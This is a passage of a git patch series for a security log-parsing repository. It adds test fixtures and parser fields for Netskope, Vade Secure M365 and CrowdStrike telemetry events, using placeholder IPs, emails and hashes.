DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Netskope",
+        "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}",
+    "event": {
+      "action": "Upload",
+      "category": [
+        "network"
+      ],
+      "dataset": "nspolicy",
+      "duration": 0,
+      "kind": "event",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-14T09:04:46Z",
+    "destination": {
+      "address": "1.2.3.4",
+      "bytes": 0,
+      "geo": {
+        "city_name": "Prague",
+        "country_iso_code": "CZ",
+        "location": {
+          "lat": 50.0883,
+          "lon": 14.4124
+        },
+        "postal_code": "110 00",
+        "region_name": "Prague",
+        "timezone": "Europe/Prague"
+      },
+      "ip": "1.2.3.4"
+    },
+    "file": {
+      "hash": {
+        "md5": "68b329da9893e34099c7d8ad5cb9c940"
+      },
+      "mime_type": "File Type Not Detected",
+      "name": "object.txt",
+      "size": 24
+    },
+    "host": {
+      "name": "PC-HOST01",
+      "os": {
+        "name": "Windows 10",
+        "platform": "windows",
+        "type": "windows",
+        "version": "Windows NT 10.0"
+      }
+    },
+    "netskope": {
+      "events": {
+        "access_method": "Client",
+        "application": {
+          "category": "Remote Access",
+          "name": "App"
+        },
+        "ccl": "medium"
+      }
+    },
+    "network": {
+      "bytes": 0
+    },
+    "observer": {
+      "vendor": "Netskope"
+    },
+    "related": {
+      "hash": [
+        "68b329da9893e34099c7d8ad5cb9c940"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ],
+      "user": [
+        "JDOE"
+      ]
+    },
+    "rule": {
+      "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518"
+    },
+    "source": {
+      "address": "5.6.7.8",
+      "bytes": 0,
+      "geo": {
+        "city_name": "Paris",
+        "country_iso_code": "FR",
+        "location": {
+          "lat": 48.6673,
+          "lon": 2.3476
+        },
+        "postal_code": "75001",
+        "region_name": "\u00cele-de-France",
+        "timezone": "Europe/Paris"
+      },
+      "ip": "5.6.7.8"
+    },
+    "url": {
+      "original": "url.app.com/object2.txt",
+      "path": "url.app.com/object2.txt"
+    },
+    "user": {
+      "domain": "mail.com",
+      "email": "JDOE@mail.com",
+      "name": "JDOE"
+    },
+    "user_agent": {
+      "name": "CHROME",
+      "version": "6.0;"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json
index a882c2ac5..4c435b860 100644
--- a/Netskope/netskope_events/tests/test_user_alert.json
+++ b/Netskope/netskope_events/tests/test_user_alert.json
@@ -5,7 +5,7 @@
   "expected": {
     "message": "{\n  \"_id\": \"882049056ee9e069c1c329b7\",\n  \"access_method\": \"Client\",\n  \"action\": \"useralert\",\n  \"activity\": \"Share\",\n  \"alert\": \"yes\",\n  \"app\": \"WeTransfer\",\n  \"app_session_id\": 1111111111111111111,\n  \"appcategory\": \"Cloud Storage\",\n  \"browser\": \"Edge\",\n  \"browser_session_id\": 2222222222222222222,\n  \"browser_version\": \"108.0.1462.54\",\n  \"category\": \"Cloud Storage\",\n  \"cci\": 58,\n  \"ccl\": \"low\",\n  \"connection_id\": 3333333333333333333,\n  \"count\": 1,\n  \"device\": \"Windows Device\",\n  \"device_classification\": \"unmanaged\",\n  \"dst_country\": \"IE\",\n  \"dst_geoip_src\": 2,\n  \"dst_latitude\": 53.3379,\n  \"dst_location\": \"Dublin\",\n  \"dst_longitude\": -6.2591,\n  \"dst_region\": \"Leinster\",\n  \"dst_timezone\": \"Europe/Dublin\",\n  \"dst_zipcode\": \"D02\",\n  \"dstip\": \"108.128.91.183\",\n  \"from_user\": \"jane.doe@example.org\",\n  \"hostname\": \"TEST-1234\",\n  \"managed_app\": \"no\",\n  \"managementID\": \"99999999999999999999999999999999\",\n  \"netskope_pop\": \"FR-PAR1\",\n  \"notify_template\": \"useralert_justify.html\",\n  \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n  \"object\": \"Client.exe\",\n  \"object_type\": \"File\",\n  \"organization_unit\": \"\",\n  \"os\": \"Windows 11\",\n  \"os_version\": \"Windows 11\",\n  \"page\": \"wetransfer.com/\",\n  \"page_site\": \"Web Background\",\n  \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n  \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n  \"protocol\": \"HTTPS/2\",\n  \"referer\": \"https://wetransfer.com/\",\n  \"request_id\": 4444444444444444444,\n  \"severity\": \"unknown\",\n  \"site\": \"WeTransfer\",\n  \"src_country\": \"FR\",\n  \"src_geoip_src\": 2,\n  \"src_latitude\": 48.11,\n  \"src_location\": \"Rennes\",\n  \"src_longitude\": -1.6744,\n  \"src_region\": \"Brittany\",\n  \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n  \"src_timezone\": \"Europe/Paris\",\n  \"src_zipcode\": \"35000\",\n  \"srcip\": \"4.3.2.1\",\n  \"telemetry_app\": \"\",\n  \"timestamp\": 1671634321,\n  \"to_user\": \"a@a.fr\",\n  \"traffic_type\": \"CloudApp\",\n  \"transaction_id\": 4444444444444444444,\n  \"type\": \"nspolicy\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"url\": \"wetransfer.com/api/v4/transfers/email\",\n  \"user\": \"john.doe@example.org\",\n  \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n  \"userip\": \"1.2.3.4\",\n  \"userkey\": \"john.doe@example.org\",\n  \"internal_collaborator_count\": 0,\n  \"fromlogs\": \"\",\n  \"dlp_incident_id\": 0,\n  \"owner\": \"\",\n  \"dlp_profile\": \"\",\n  \"workspace\": \"\",\n  \"user_id\": \"\",\n  \"userPrincipalName\": \"\",\n  \"true_obj_category\": \"\",\n  \"dlp_is_unique_count\": \"\",\n  \"orignal_file_path\": \"\",\n  \"other_categories\": [],\n  \"serial\": \"\",\n  \"tss_mode\": \"\",\n  \"conn_duration\": 0,\n  \"from_user_category\": \"\",\n  \"md5\": \"\",\n  \"data_type\": \"\",\n  \"title\": \"\",\n  \"log_file_name\": \"\",\n  \"dstport\": 0,\n  \"exposure\": \"\",\n  \"instance_id\": \"\",\n  \"audit_category\": \"\",\n  \"netskope_activity\": \"\",\n  \"file_type\": \"\",\n  \"total_collaborator_count\": 0,\n  \"file_path\": \"\",\n  \"modified\": 0,\n  \"dlp_rule_count\": 0,\n  \"suppression_end_time\": 0,\n  \"CononicalName\": \"\",\n  \"alert_type\": \"\",\n  \"sanctioned_instance\": \"\",\n  \"suppression_start_time\": 0,\n  \"dlp_parent_id\": 0,\n  \"true_obj_type\": \"\",\n  \"dlp_mail_parent_id\": \"\",\n  \"audit_type\": \"\",\n  \"workspace_id\": \"\",\n  \"dsthost\": \"\",\n  \"web_universal_connector\": \"\",\n  \"req_cnt\": 0,\n  \"mime_type\": \"\",\n  \"suppression_key\": \"\",\n  \"scan_type\": \"\",\n  \"shared_with\": \"\",\n  \"client_bytes\": 0,\n  \"object_id\": \"\",\n  \"user_category\": \"\",\n  \"dlp_rule\": \"\",\n  \"parent_id\": \"\",\n  \"sha256\": \"\",\n  \"dlp_rule_severity\": \"\",\n  \"logintype\": \"\",\n  \"org\": \"\",\n  \"dlp_unique_count\": 0,\n  \"file_size\": 0,\n  \"instance\": \"\",\n  \"sAMAccountName\": \"\",\n  \"resp_cnt\": 0,\n  \"universal_connector\": \"\",\n  \"numbytes\": 0,\n  \"server_bytes\": 0,\n  \"channel_id\": \"\",\n  \"file_lang\": \"\",\n  \"app_activity\": \"\",\n  \"appsuite\": \"\",\n  \"sessionid\": \"\",\n  \"loginurl\": \"\",\n  \"dlp_file\": \"\",\n  \"data_center\": \"\",\n  \"custom_connector\": \"\"\n}\n",
     "event": {
-      "action": "Share",
+      "action": "useralert",
       "category": [
         "network"
       ],

From dc3c4ff33c7a2ecedd7e1f28c5662b24f763efa0 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 19 Nov 2024 11:32:02 +0100
Subject: [PATCH 253/317] Improvement: Vade Secure M365 - Add parsed fields

---
 VadeSecure/vade_secure_m365/_meta/fields.yml  |  5 ++
 VadeSecure/vade_secure_m365/ingest/parser.yml |  5 ++
 .../vade_secure_m365/tests/email_02.json      | 61 +++++++++++++++
 .../tests/email_with_attachment_02.json       | 77 +++++++++++++++++++
 4 files changed, 148 insertions(+)
 create mode 100644 VadeSecure/vade_secure_m365/tests/email_02.json
 create mode 100644 VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json

diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml
index 1e4a81657..a3f60b15c 100644
--- a/VadeSecure/vade_secure_m365/_meta/fields.yml
+++ b/VadeSecure/vade_secure_m365/_meta/fields.yml
@@ -58,6 +58,11 @@ vadesecure.attachments:
   short: vadesecure.to_header
   type: array
 
+vadesecure.auth_results_details:
+  description: Details of security protocols, mostly SPF, DKIM and DMARC.
+  name: vadesecure.auth_results_details
+  type: object
+
 vadesecure.campaign.actions:
   description: The actions carried out for the remediation campaign.
   name: vadesecure.campaign.actions
diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml
index 539de1df4..cbac9cd2d 100644
--- a/VadeSecure/vade_secure_m365/ingest/parser.yml
+++ b/VadeSecure/vade_secure_m365/ingest/parser.yml
@@ -56,6 +56,7 @@ stages:
     actions:
       - name: set
         set:
+          vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}"
           vadesecure.folder: "{{parse_json.message.folder}}"
           vadesecure.from_header: "{{parse_json.message.from_header}}"
           vadesecure.to_header: "{{parse_json.message.to_header}}"
@@ -131,3 +132,7 @@ stages:
       - set:
           source.ip: "{{parse_json.message.sender_ip}}"
         filter: "{{parse_json.message.sender_ip| is_ipaddress}}"
+
+      - set:
+          email.reply_to.address: "{{parse_json.message.reply_to_header}}"
+        filter: "{{parse_json.message.reply_to_header != ''}}"
diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json
new file mode 100644
index 000000000..7b2c0ae83
--- /dev/null
+++ b/VadeSecure/vade_secure_m365/tests/email_02.json
@@ -0,0 +1,61 @@
+{
+  "input": {
+    "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe<jd@doe.fr>\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"<d0a5da95-4028-439b-b9d5-a4f220c59022@protection.outlook.com>\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Vade for M365",
+        "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe<jd@doe.fr>\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"<d0a5da95-4028-439b-b9d5-a4f220c59022@protection.outlook.com>\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}",
+    "event": {
+      "action": "nothing",
+      "category": [
+        "email"
+      ],
+      "type": [
+        "info"
+      ]
+    },
+    "email": {
+      "attachments": [],
+      "from": {
+        "address": "jd@doe.fr"
+      },
+      "local_id": "cs72a9b6r0glddhdfh7g",
+      "message_id": "<d0a5da95-4028-439b-b9d5-a4f220c59022@protection.outlook.com>",
+      "reply_to": {
+        "address": "user@company.com"
+      },
+      "subject": "Informations",
+      "to": {
+        "address": "alan.smithee@doe.fr"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "vadesecure": {
+      "attachments": [],
+      "auth_results_details": {
+        "dkim": "none",
+        "dmarc": "fail",
+        "spf": "temperror"
+      },
+      "from_header": "John Doe<jd@doe.fr>",
+      "last_report_date": "0001-01-01T00:00:00Z",
+      "overdict": "clean",
+      "status": "LEGIT",
+      "to_header": "Alan.smithee@doe.fr",
+      "whitelist": "false"
+    }
+  }
+}
\ No newline at end of file
diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json
new file mode 100644
index 000000000..679e24c56
--- /dev/null
+++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json
@@ -0,0 +1,77 @@
+{
+  "input": {
+    "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE <john.doe@mail.fr>\", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee <alan.smithee@company.fr>\", \"subject\": \"Re: Your mail\", \"message_id\": \"<D0a5da95-4028-439b-b9d5-a4f220c59022@protection.outlook.com>\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Vade for M365",
+        "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE <john.doe@mail.fr>\", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee <alan.smithee@company.fr>\", \"subject\": \"Re: Your mail\", \"message_id\": \"<D0a5da95-4028-439b-b9d5-a4f220c59022@protection.outlook.com>\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}",
+    "event": {
+      "action": "nothing",
+      "category": [
+        "email"
+      ],
+      "type": [
+        "info"
+      ]
+    },
+    "email": {
+      "attachments": [
+        {
+          "file": {
+            "extension": "jpg",
+            "hash": {
+              "md5": "7bc2b146a309acbff2da55e6b4124a82",
+              "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b",
+              "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368",
+              "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423"
+            },
+            "name": "image001.jpg",
+            "size": 5130
+          }
+        }
+      ],
+      "from": {
+        "address": "john.doe@mail.fr"
+      },
+      "local_id": "csb6q1pgfisg9knp1l5g",
+      "message_id": "<D0a5da95-4028-439b-b9d5-a4f220c59022@protection.outlook.com>",
+      "subject": "Re: Your mail",
+      "to": {
+        "address": "alan.smithee@company.fr"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "vadesecure": {
+      "attachments": [
+        {
+          "filename": "image001.jpg",
+          "id": "12345678901234567890"
+        }
+      ],
+      "auth_results_details": {
+        "dkim": "fail",
+        "dmarc": "none",
+        "spf": "temperror"
+      },
+      "from_header": "John DOE <john.doe@mail.fr>",
+      "last_report_date": "0001-01-01T00:00:00Z",
+      "overdict": "clean",
+      "status": "LEGIT",
+      "to_header": "Alan Smithee <alan.smithee@company.fr>",
+      "whitelist": "false"
+    }
+  }
+}
\ No newline at end of file

From cb5456827e5201fd75229cc4770a445a72738be0 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 19 Nov 2024 11:59:10 +0100
Subject: [PATCH 254/317] CrowdStrike telemetry: fix on parsing error

---
 CrowdStrike/crowdstrike-telemetry/_meta/fields.yml         | 5 -----
 CrowdStrike/crowdstrike-telemetry/ingest/parser.yml        | 7 ++-----
 .../crowdstrike-telemetry/tests/telemetry_event_26.json    | 5 ++++-
 3 files changed, 6 insertions(+), 11 deletions(-)

diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml
index 75e1b7434..a59b68006 100644
--- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml
+++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml
@@ -1,8 +1,3 @@
-crowdstrike.base_filename:
-  description: Base Filename
-  name: crowdstrike.base_filename
-  type: keyword
-
 crowdstrike.customer_id:
   description: Customer ID (cid)
   name: crowdstrike.customer_id
diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml
index 03e9819e7..5d0069c0a 100644
--- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml
+++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml
@@ -53,9 +53,6 @@ stages:
           "host.domain": "{{parsed_event.message.MachineDomain}}"
           "host.mac": "{{parsed_event.message.MAC}}"
 
-      - set:
-          crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}"
-
   set_registry_fields:
     actions:
       - set:
@@ -180,9 +177,9 @@ stages:
       - set:
           "event.action": "{{parsed_event.message.event_simpleName}}"
 
-          "process.command_line": "{{parsed_event.message.CommandLine}}"
+          "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}"
           "process.executable": "{{parsed_event.message.ImageFileName}}"
-          "process.name": "{{parsed_event.message.ImageFileName | basename}}"
+          "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}"
           "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}"
           "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}"
           "process.parent.pid": "{{parsed_event.message.ParentProcessId}}"
diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json
index 1e7368eee..01e9a933f 100644
--- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json
+++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json
@@ -18,7 +18,6 @@
       "id": "111111111111111"
     },
     "crowdstrike": {
-      "base_filename": "svchost.exe",
       "customer_id": "222222222222222222222"
     },
     "file": {
@@ -34,6 +33,10 @@
         "platform": "win"
       }
     },
+    "process": {
+      "command_line": "svchost.exe",
+      "name": "svchost.exe"
+    },
     "related": {
       "ip": [
         "4.3.2.1"

From fa87d4f91aea0f4fe26bdcaa466793c87268fddf Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 20 Nov 2024 10:51:50 +0200
Subject: [PATCH 255/317] Smart descs

---
 .../trend-micro-vision-one/_meta/smart-descriptions.json      | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
